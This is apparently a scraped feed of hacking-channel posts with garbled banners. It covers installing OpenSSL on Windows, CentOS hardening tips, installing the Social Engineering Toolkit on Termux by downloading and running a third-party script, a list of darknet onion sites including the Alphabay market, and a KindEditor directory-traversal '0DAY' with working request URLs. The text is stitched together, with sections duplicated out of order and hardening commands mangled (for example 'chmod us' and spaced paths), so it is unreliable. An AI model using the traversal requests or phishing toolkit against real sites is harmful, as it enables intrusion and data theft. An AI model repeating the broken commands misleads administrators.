β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ How to install the most recent version of OpenSSL on Windows 10 :
Take OpenSSL for example.
This open source cryptographic library that implements the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols is designed to βprotect communications over computer networks from eavesdropping,β but guess what?
2) From the very beginning, it was riddled with mistakes.
This can be inevitable, to a certain extent - after all, we're talking about software.
While there is nothing you can do about bugs that have yet to be identified, you can at least protect your systems from bugs that are already fixed and documented.
It's a shame that the official OpenSSL site only offers Linux source.
While Linux distributions usually ship with OpenSSL, this does not apply to Windows ... or, say, "Windows distributions".
If you want to run it, you need a Windows binary, and if you don't want to build it yourself, you must find another option.
1) Step 1. Download the binary
Finding OpenSSL binaries for Windows is no easy task, but don't despair.
They exist.
2) To download the required one, follow the link:
https://slproweb.com/products/Win32OpenSSL.html
Don't be fooled by either the Win32 string in the URL or the navigation pointing to a seemingly ancient download page from back in 2004.
3) Scroll down to the Download Win32 OpenSSL section.
Now you need to select the correct file from this list.
4) There are two main types for each version: light and full.
5) Download a file called "Win64 OpenSSL v1.1.0f" (or a newer version as soon as it becomes available) to download the full installer.
6) Step 2. Run the installer
We recommend installing OpenSSL outside of your Windows system directory.
Follow the GUI installation instructions.
7) Step 3. Run the OpenSSL binary
To get started with OpenSSL, you can simply right click on it in Windows Explorer at its installation location, like in my case:
C: \ OpenSSL-Win64 \ bin \
then select "Run as administrator".
8) You can now start generating OpenSSL keys. (By the way, users of the PuTTY remote access utility can export the OpenSSH key from PuTTYgen.)
9) When using OpenSSL on Windows this way, you simply skip the openssl command you see at the prompt.
For example, to create a key pair using OpenSSL on Windows, you can enter:
10) openssl req -newkey rsa: 2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
and follow the onscreen instructions as usual.
11) To view the certificate:
openssl x509 -text -noout -in certificate.pem
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ How to install the most recent version of OpenSSL on Windows 10 :
Take OpenSSL for example.
This open source cryptographic library that implements the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols is designed to βprotect communications over computer networks from eavesdropping,β but guess what?
2) From the very beginning, it was riddled with mistakes.
This can be inevitable, to a certain extent - after all, we're talking about software.
While there is nothing you can do about bugs that have yet to be identified, you can at least protect your systems from bugs that are already fixed and documented.
It's a shame that the official OpenSSL site only offers Linux source.
While Linux distributions usually ship with OpenSSL, this does not apply to Windows ... or, say, "Windows distributions".
If you want to run it, you need a Windows binary, and if you don't want to build it yourself, you must find another option.
1) Step 1. Download the binary
Finding OpenSSL binaries for Windows is no easy task, but don't despair.
They exist.
2) To download the required one, follow the link:
https://slproweb.com/products/Win32OpenSSL.html
Don't be fooled by either the Win32 string in the URL or the navigation pointing to a seemingly ancient download page from back in 2004.
3) Scroll down to the Download Win32 OpenSSL section.
Now you need to select the correct file from this list.
4) There are two main types for each version: light and full.
5) Download a file called "Win64 OpenSSL v1.1.0f" (or a newer version as soon as it becomes available) to download the full installer.
6) Step 2. Run the installer
We recommend installing OpenSSL outside of your Windows system directory.
Follow the GUI installation instructions.
7) Step 3. Run the OpenSSL binary
To get started with OpenSSL, you can simply right click on it in Windows Explorer at its installation location, like in my case:
C: \ OpenSSL-Win64 \ bin \
then select "Run as administrator".
8) You can now start generating OpenSSL keys. (By the way, users of the PuTTY remote access utility can export the OpenSSH key from PuTTYgen.)
9) When using OpenSSL on Windows this way, you simply skip the openssl command you see at the prompt.
For example, to create a key pair using OpenSSL on Windows, you can enter:
10) openssl req -newkey rsa: 2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
and follow the onscreen instructions as usual.
11) To view the certificate:
openssl x509 -text -noout -in certificate.pem
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ CentOS Server Security Tips :
1) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.
Often, buffer overflow attacks can use such executables to run unauthorized code as root.
# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
To clear the setuid bit, run the following command:
# chmod us / path / to / binary_file
To clear the setgid bit, run the following command:
# chmod gs / path / to / binary_file
2) Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.
Run the below find command to list files or directories without users and groups.
# find / -nouser -o -nogroup -exec ls -l {} \;
3) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.
Run the command below to display writable files other than symbolic links which are always writable to everyone.
# find / -path / proc -prune -o -perm -2! -type l βls
4) Create strong passwords
Create a password that is at least eight characters long.
Password must contain numbers, special characters and capital letters.
Use pwmake to generate a 128-bit password from / dev / urandom.
# pwmake 128
5) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:
password required pam_pwquality.so retry = 3
By adding this line, you enter a policy where the entered password cannot contain more than 3 characters in a monotonic sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.
To force users to use a password that is at least 8 characters long, including all character classes, sequential character validation, add the following lines to /etc/security/pwquality.conf:
minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian
6) Use password aging
The chage command can be used to control the age of a user's password.
To set the age of a user's password to 45 days, use the following command:
# chage -M 45 username
To disable password expiration use the command:
# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username
7) Blocking accounts
User accounts can be locked out by running passwd or usermod command:
# passwd -l username
# usermod -L username
To unlock accounts, use the -u option for the passwd command and the -U option for usermod.
see also:
π§ How to safely delete a user account in Linux
How to lock a user account on Centos 7
8) Deny shell access
To prevent the system account (regular account or service account) from accessing the bash shell, change the root shell to / usr / sbin / nologin or / bin / false in the / etc / passwd file by entering the following command:
# usermod -s / bin / false username
To change the shell when creating a new user, enter the following command:
# useradd -s / usr / sbin / nologin username
9) Lock the user's virtual console with vlock
vlock is a program used to lock one session in the Linux console.
Install the program and start blocking your terminal session by running the following commands:
# yum install vlock
# vlock
10) Use a centralized system for account management and authentication
Using a centralized authentication system can greatly simplify account management. Services that can offer this type of account management are IPA Server, LDAP, Kerberos, Microsoft Active Directory, Nis, Samba ADS, or Winbind.
Some of these services are securely protected by default with cryptographic protocols and symmetric key cryptography such as Kerberos.
11) Force mount read-only USB drives
Using the blockdev utility, you can force all removable media to be mounted read-only.
π¦π§ CentOS Server Security Tips :
1) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.
Often, buffer overflow attacks can use such executables to run unauthorized code as root.
# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
To clear the setuid bit, run the following command:
# chmod us / path / to / binary_file
To clear the setgid bit, run the following command:
# chmod gs / path / to / binary_file
2) Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.
Run the below find command to list files or directories without users and groups.
# find / -nouser -o -nogroup -exec ls -l {} \;
3) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.
Run the command below to display writable files other than symbolic links which are always writable to everyone.
# find / -path / proc -prune -o -perm -2! -type l βls
4) Create strong passwords
Create a password that is at least eight characters long.
Password must contain numbers, special characters and capital letters.
Use pwmake to generate a 128-bit password from / dev / urandom.
# pwmake 128
5) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:
password required pam_pwquality.so retry = 3
By adding this line, you enter a policy where the entered password cannot contain more than 3 characters in a monotonic sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.
To force users to use a password that is at least 8 characters long, including all character classes, sequential character validation, add the following lines to /etc/security/pwquality.conf:
minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian
6) Use password aging
The chage command can be used to control the age of a user's password.
To set the age of a user's password to 45 days, use the following command:
# chage -M 45 username
To disable password expiration use the command:
# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username
7) Blocking accounts
User accounts can be locked out by running passwd or usermod command:
# passwd -l username
# usermod -L username
To unlock accounts, use the -u option for the passwd command and the -U option for usermod.
see also:
π§ How to safely delete a user account in Linux
How to lock a user account on Centos 7
8) Deny shell access
To prevent the system account (regular account or service account) from accessing the bash shell, change the root shell to / usr / sbin / nologin or / bin / false in the / etc / passwd file by entering the following command:
# usermod -s / bin / false username
To change the shell when creating a new user, enter the following command:
# useradd -s / usr / sbin / nologin username
9) Lock the user's virtual console with vlock
vlock is a program used to lock one session in the Linux console.
Install the program and start blocking your terminal session by running the following commands:
# yum install vlock
# vlock
10) Use a centralized system for account management and authentication
Using a centralized authentication system can greatly simplify account management. Services that can offer this type of account management are IPA Server, LDAP, Kerberos, Microsoft Active Directory, Nis, Samba ADS, or Winbind.
Some of these services are securely protected by default with cryptographic protocols and symmetric key cryptography such as Kerberos.
11) Force mount read-only USB drives
Using the blockdev utility, you can force all removable media to be mounted read-only.
For example, create a new udev configuration file named 80-readonly-usb.rules in the /etc/udev/rules.d/ directory with the following content:
SUBSYSTEM == "block", ATTRS {removable} == "1", RUN {program} = "/ sbin / blockdev --setro% N"
Then apply the rule with the following command:
# udevadm control -reload
12) Disable TTY root access
To prevent the root account from logging in through all console devices (TTY), delete the contents of the securetty file by typing the following command at a command prompt as root.
# cp / etc / securetty /etc/securetty.bak
# cat / dev / null> / etc / securetty
Remember this rule does not apply to SSH login
To prevent logging in via SSH, edit the / etc / ssh / sshd_config file and add the following line:
PermitRootLogin no
13) Use POSIX ACL to extend system rights
Access Control Lists (ACLs) can define access rights for more than one user or group, and can define rights for programs, processes, files, and directories.
If you set an ACL for a directory, its child directories will automatically inherit the same rights.
For instance:
# setfacl -mu: user: rw file
# getfacl file
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
SUBSYSTEM == "block", ATTRS {removable} == "1", RUN {program} = "/ sbin / blockdev --setro% N"
Then apply the rule with the following command:
# udevadm control -reload
12) Disable TTY root access
To prevent the root account from logging in through all console devices (TTY), delete the contents of the securetty file by typing the following command at a command prompt as root.
# cp / etc / securetty /etc/securetty.bak
# cat / dev / null> / etc / securetty
Remember this rule does not apply to SSH login
To prevent logging in via SSH, edit the / etc / ssh / sshd_config file and add the following line:
PermitRootLogin no
13) Use POSIX ACL to extend system rights
Access Control Lists (ACLs) can define access rights for more than one user or group, and can define rights for programs, processes, files, and directories.
If you set an ACL for a directory, its child directories will automatically inherit the same rights.
For instance:
# setfacl -mu: user: rw file
# getfacl file
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ How to install the most recent version of OpenSSL on Windows 10 ?
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦no root Social Engineering Toolkit on Termux
#FastTips
1) pkg update && pkg upgrade -y
2) apt install curl -y
3) curl -LO https://raw.githubusercontent.com/Hax4us/setoolkit/master/setoolkit.sh
4) sh setoolkit.sh
5) After finishing the above process type the following command
6) cd setoolkit
7) ./setup.py install
8) ./setoolkit
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦no root Social Engineering Toolkit on Termux
#FastTips
1) pkg update && pkg upgrade -y
2) apt install curl -y
3) curl -LO https://raw.githubusercontent.com/Hax4us/setoolkit/master/setoolkit.sh
4) sh setoolkit.sh
5) After finishing the above process type the following command
6) cd setoolkit
7) ./setup.py install
8) ./setoolkit
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DarkNet SITES 24/24 β- 7/24
https://onion.cab - clearnet (!) onion.cab, view hidden onion sites without Tor;
http://facebookcorewwwi.onion - Facebook, the same one));
http://sms4tor3vcr2geip.onion - SMS4TOR, a self-destruct message service;
http://oi4bvjslpt5gabjq.onion - RΓ©publique de Hackers, another French-language hacker forum;
http://pwoah7foa6au2pul.onion - Alphabay market;
http://mail2tor2zyjdctd.onion - Mail2Tor, e-mail service;
http://torbox3uiot6wchz.onion - TorBox, e-mail service inside .onion;
http://zw3crggtadila2sg.onion/imageboard - TorChan, "Tor's # 1 imageboard";
http://cyjabr4pfzupo7pg.onion - CYRUSERV, a jabber service from CYRUSERV;
http://rutorc6mqdinc4cz.onion - RuTor.org, a well-known torrent tracker;
http://flibustahezeous3.onion is the famous onion-style electronic library.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DarkNet SITES 24/24 β- 7/24
https://onion.cab - clearnet (!) onion.cab, view hidden onion sites without Tor;
http://facebookcorewwwi.onion - Facebook, the same one));
http://sms4tor3vcr2geip.onion - SMS4TOR, a self-destruct message service;
http://oi4bvjslpt5gabjq.onion - RΓ©publique de Hackers, another French-language hacker forum;
http://pwoah7foa6au2pul.onion - Alphabay market;
http://mail2tor2zyjdctd.onion - Mail2Tor, e-mail service;
http://torbox3uiot6wchz.onion - TorBox, e-mail service inside .onion;
http://zw3crggtadila2sg.onion/imageboard - TorChan, "Tor's # 1 imageboard";
http://cyjabr4pfzupo7pg.onion - CYRUSERV, a jabber service from CYRUSERV;
http://rutorc6mqdinc4cz.onion - RuTor.org, a well-known torrent tracker;
http://flibustahezeous3.onion is the famous onion-style electronic library.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kindeditor traverse directory 0DAY problem:
KindEditor is a set of open source HTML visual editor, mainly used to allow users to obtain WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs. KindEditor is very suitable for use on CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in July 2006, KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.
π¦Use method:
1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kindeditor traverse directory 0DAY problem:
KindEditor is a set of open source HTML visual editor, mainly used to allow users to obtain WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs. KindEditor is very suitable for use on CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in July 2006, KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.
π¦Use method:
1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β